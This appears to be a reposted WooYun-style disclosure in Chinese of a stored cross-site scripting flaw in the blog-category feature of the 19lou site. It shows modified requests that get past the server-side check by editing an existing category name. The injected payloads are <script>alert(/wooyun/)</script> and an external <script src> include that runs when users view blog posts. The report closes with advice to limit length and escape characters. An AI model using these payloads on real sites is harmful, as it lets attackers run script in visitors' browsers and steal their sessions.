19楼某处过滤不严格,导致触发存储型跨站
详细说明:
19楼博客分类处为对提交数据进行过滤,导致跨站。
博客分类--创建新分类
(最多可输入14个字符)
修改提交包
Host: HdhCmsTest19lou测试数据
Origin: http://HdhCmsTest19lou测试数据
X-Requested-With: XMLHttpRequest
Referer: http://HdhCmsTest19lou测试数据/user/blog/list?uid=xxxx
Accept-Language: zh-cn
Accept-Encoding: gzip, deflate
categoryName=sss
修改categoryName参数值为<script>alert(/wooyun/)</script>
提示:
看来是服务端做的校验。
先创建个wooyun的分类,四处转转再说
点击[管理博客分类],对之前提交的分类就行管理
对提交的数据包中的name参数进行修改:
Host: HdhCmsTest19lou测试数据
Origin: http://HdhCmsTest19lou测试数据
X-Requested-With: XMLHttpRequest
Referer: http://HdhCmsTest19lou测试数据/user/blog/list?uid=2xxxx
Accept-Language: zh-cn
Accept-Encoding: gzip, deflate
id=46xxx&name=wooyun
将name的值修改为<script>alert(/wooyun/)</script>
成功弹窗。
引入外部js
<script src=http://localhost/test.js></script>
发布blog,选择分类为我们添加的分类
当用户访问blog文章时候,成功触发。
修复方案:
1、从服务端限制提交长度
2、转义特殊符
查看更多关于19楼存储型跨站 - 网站安全 - 自学php的详细内容...